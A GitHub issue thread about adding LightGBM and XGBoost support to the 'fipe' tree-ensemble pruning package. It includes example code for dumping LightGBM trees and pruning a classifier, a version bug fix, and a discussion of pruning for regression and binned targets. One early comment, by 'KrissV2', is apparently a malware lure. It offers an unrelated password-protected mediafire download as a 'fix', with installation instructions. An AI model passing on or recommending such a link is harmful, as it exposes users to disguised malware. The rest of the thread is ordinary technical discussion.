### ISSUE TITLE
support for LightGBM

### ISSUE THREAD

**Issue by mglowacki100** [eminyous/fipe#2]
Hi,
First of all cool package!
Is it possible to add for support LightGBM?
The issue is that LightGBM doesn't follow sklearn design pattern where e.g. random forest model is iterable and every element is sklearn decision tree, but LightGBM also exposes single trees, so it should be possible in principle.

```
import lightgbm as lgb

base = lgb.LGBMRegressor(n_estimators=...)
...
booster = base.booster_
model_json = booster.dump_model()
trees = model_json['tree_info']
```
```
trees[0]['tree_structure'] #first tree structure

{'split_index': 0,
 'split_feature': 2,
 'split_gain': 74.27210235595703,
 'threshold': 3644.0000000000005,
 'decision_type': '<=',
 'default_left': True,
 'missing_type': 'None',
 'internal_value': 1,
 'internal_weight': 0,
 'internal_count': 150,
 'left_child': {'split_index': 4,
  'split_feature': 1,
  'split_gain': 0.030392199754714966,
  'threshold': 5625.000000000001,
  'decision_type': '<=',
  'default_left': True,
  'missing_type': 'None',
  'internal_value': 0.901961,
  'internal_weight': 51,
  'internal_count': 51,
  'left_child': {'leaf_index': 0,
   'leaf_value': 0.905,
   'leaf_weight': 20,
   'leaf_count': 20},
  'right_child': {'leaf_index': 5,
   'leaf_value': 0.9,
   'leaf_weight': 31,
   'leaf_count': 31}}
....
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by eminyous** [comment]
Hello,

First of all, thank you for your interest and your suggestion!
This is an interesting extension of the package. We will be working on it very soon.

By the way, thank you again for the hints on how to export the LGBM structures.

**Comment by mglowacki100** [comment]
Hi @eminyous 
 Just checking in to see if there has been any progress on this feature. Let me know when you have an update!

**Comment by eminyous** [comment]
Hi @mglowacki100,

Just to inform you that the current implementation of the package on github supports the use of LightGBM classifiers.

**Comment by mglowacki100** [comment]
Hi @eminyous 
Thanks! I've tried to run new version (1.0.3) with minimal example but unfortunately I get error `ValueError: name argument has incompatible shape`. The same code works with version 1.0.2.
Here is example on google colab: https://colab.research.google.com/drive/1uctitK2JRr002dRxbroxaJtSD0CltJ1s?usp=sharing

**Comment by eminyous** [comment]
Hi @mglowacki100 
Thanks for the bug. Indeed, this can be easily fixed by adding `as_frame=True` in load_iris call. You can have a look to the updated Readme and see how to fix it.

**Comment by mglowacki100** [comment]
Thanks @eminyous  ! it works :)
Do you have any plans to support regression task??

Here is an example with lightGBM classifier:
```
import gurobipy as gp
import numpy as np
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
import lightgbm as lgb
from fipe import FIPE, FeatureEncoder

# Load data encode features
data = load_iris(as_frame=True)
X = pd.DataFrame(data.data)
y = data.target

encoder = FeatureEncoder(X)
X = encoder.X.to_numpy()

# Train tree ensemble
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
n_estimators = 10
base = lgb.LGBMClassifier(n_estimators=n_estimators)

base.fit(X, y)

# Read and normalize weights
eps = 1e-6
tol = 1e4
w = np.ones(n_estimators) * tol

# Prune using FIPE
norm = 1
print(f"Pruning model by minimizing l_{norm} norm.")
env = gp.Env()
env.setParam("OutputFlag", 0)
pruner = FIPE(
    base=base,
    encoder=encoder,
    weights=w,
    norm=norm,
    env=env,
    eps=eps,
    tol=tol,
)
print("Building pruner...")
pruner.build()
pruner.add_samples(X_train)
print("Pruning...")
pruner.prune()
print("Finished pruning.")

# Read pruned model
n_active_estimators = pruner.n_active_estimators
print(
    f"The pruned ensemble has {n_active_estimators}"
    f"/{base.n_estimators} active estimators."
)

# Verify functionally-identical on test data
y_pred = base.predict(X_test)
y_pruned = pruner.predict(X_test)
fidelity = np.mean(y_pred == y_pruned)
print(f"Fidelity to initial ensemble is {fidelity * 100:.2f}%.")
```

**Comment by alexforel** [comment]
Hi @mglowacki100 ,

Thank you for your interest in our project! Glad to see that it works for you with LightGBM. Note that the package also supports XGBoost now.

No, we do not currently plan to support regression tasks. This is because we believe regression has a much lower potential for pruning than classification. Contrary to classification, regression tasks have many different labels. Providing a smaller yet functionally identical model on the entire space is likely to be very challenging.

**Comment by mglowacki100** [comment]
Hi @alexforel 
What about special case of regression where there is small amount of labels i.e. ranking (1-3, 1-5, 1-10, 1-100) or where we could bin the target ?

**Comment by alexforel** [comment]
Hi @mglowacki100 ,

Good point! There are certainly use cases, or slight adaptations of regression tasks, that could make pruning an interesting area to explore. But the regression setting is not something we have on our immediate roadmap. Thanks again for sharing your thoughts!

**Comment by vidalt** [comment]
A quick additional comment on that, a "binned" regression can be directly cast into a classification setting with as many classes as bins. Though compression capabilities might be limited when there are many classes, converting your ensemble (for regression) into one for classification might permit employing the method without necessary adaptation.

**Comment by mglowacki100** [comment]
@vidalt Yes it is possible, but ordinary classification out of the box doesn't support order between labels, I've  to transform into multioutput binary classification. For example, for 3 labels (low-0, medium-1, high-2):
- Predict whether the value is greater than or equal to Low.
- Predict whether the value is greater than or equal to Medium.
- Combine the outputs to determine the most probable class.
Also loss will be classification specific.

@alexforel as far I understand fipe from theoretical point of view doesn't require trees to be trained with classification but from practical POV number of unique values in target need to be small. Am I correct?

**Comment by alexforel** [comment]
Hi @mglowacki100,

Regarding the binning approach, you could try the following:
- train a regression ensemble in the standard way so that the loss is a classical regression loss,
- decide on the bins (number and thresholds),
- convert the regression ensemble into a classification one given the bins, (This needs some implementation. It is not currently supported by `fipe`, but is an interesting extension.)
- run `fipe` on the classifier.
This yields a pruned multi-class ensemble that is trained on a classical regression loss.

Regarding your second point: exactly! The pruning potential is likely larger when the number of unique labels is small.
